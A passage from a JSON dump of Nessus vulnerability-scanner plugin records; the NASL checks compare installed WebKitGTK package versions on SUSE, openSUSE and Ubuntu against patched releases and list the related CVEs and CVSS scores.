script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit-jsc-4-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit-jsc-4-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2-4_0-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit-jsc-4-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit-jsc-4-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-debugsource-2.24.1-3.24.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"webkit2gtk3-devel-2.24.1-3.24.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-19T13:49:50", "description": "This update for webkit2gtk3 to version 2.24.1 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-6201, CVE-2019-6251, CVE-2019-7285, CVE-2019-7292, CVE-2019-8503, CVE-2019-8506, CVE-2019-8515, CVE-2019-8518, CVE-2019-8523, CVE-2019-8524, CVE-2019-8535, CVE-2019-8536, CVE-2019-8544, CVE-2019-8551, CVE-2019-8558, CVE-2019-8559, CVE-2019-8563, CVE-2019-11070 (bsc#1132256). This update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2019-1374)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11070", "CVE-2019-6201", "CVE-2019-6251", "CVE-2019-7285", "CVE-2019-7292", "CVE-2019-8503", "CVE-2019-8506", "CVE-2019-8515", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-1374.NASL", "href": "https://www.tenable.com/plugins/nessus/124851", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-1374.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124851);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2019-11070\", \"CVE-2019-6201\", \"CVE-2019-6251\", \"CVE-2019-7285\", \"CVE-2019-7292\", \"CVE-2019-8503\", \"CVE-2019-8506\", \"CVE-2019-8515\", \"CVE-2019-8518\", \"CVE-2019-8523\", \"CVE-2019-8524\", \"CVE-2019-8535\", \"CVE-2019-8536\", \"CVE-2019-8544\", \"CVE-2019-8551\", \"CVE-2019-8558\", \"CVE-2019-8559\", \"CVE-2019-8563\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2019-1374)\");\n script_summary(english:\"Check for the openSUSE-2019-1374 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.24.1 fixes the following\nissues :\n\nSecurity issues fixed :\n\n - CVE-2019-6201, CVE-2019-6251, CVE-2019-7285,\n CVE-2019-7292, CVE-2019-8503, CVE-2019-8506,\n CVE-2019-8515, CVE-2019-8518, CVE-2019-8523,\n CVE-2019-8524, CVE-2019-8535, CVE-2019-8536,\n CVE-2019-8544, CVE-2019-8551, CVE-2019-8558,\n CVE-2019-8559, CVE-2019-8563, CVE-2019-11070\n (bsc#1132256). This update was imported from the\n SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1132256\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk3-lang-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2-4_0-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-debuginfo-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-debugsource-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-devel-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-minibrowser-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-minibrowser-debuginfo-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-debuginfo-2.24.1-lp150.2.19.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-debuginfo / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:32:24", "description": "A large number of security issues were discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-05-01T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 17.10 : WebKitGTK+ vulnerabilities (USN-3635-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4101", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4133", "CVE-2018-4146", "CVE-2018-4161", "CVE-2018-4162", "CVE-2018-4163", "CVE-2018-4165"], "modified": "2020-09-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:17.10"], "id": "UBUNTU_USN-3635-1.NASL", "href": "https://www.tenable.com/plugins/nessus/109468", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3635-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109468);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2018-4101\", \"CVE-2018-4113\", \"CVE-2018-4114\", \"CVE-2018-4117\", \"CVE-2018-4118\", \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4122\", \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\", \"CVE-2018-4133\", \"CVE-2018-4146\", \"CVE-2018-4161\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\");\n script_xref(name:\"USN\", value:\"3635-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 17.10 : WebKitGTK+ vulnerabilities (USN-3635-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3635-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected libjavascriptcoregtk-4.0-18 and / or\nlibwebkit2gtk-4.0-37 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Webkit JIT Exploit for iOS 7.1.2');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2020 Canonical, Inc. / NASL script (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|17\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 17.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.20.1-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.20.1-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.20.1-0ubuntu0.17.10.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.20.1-0ubuntu0.17.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T15:05:39", "description": "Security fix for CVE-2018-17478 CVE-2018-17479. Update to 70.0.3538.110.\n\n----\n\nUpdate to chromium 70.0.3538.77. Fixes CVE-2018-16435 CVE-2018-17462 CVE-2018-17463 CVE-2018-17464 CVE-2018-17465 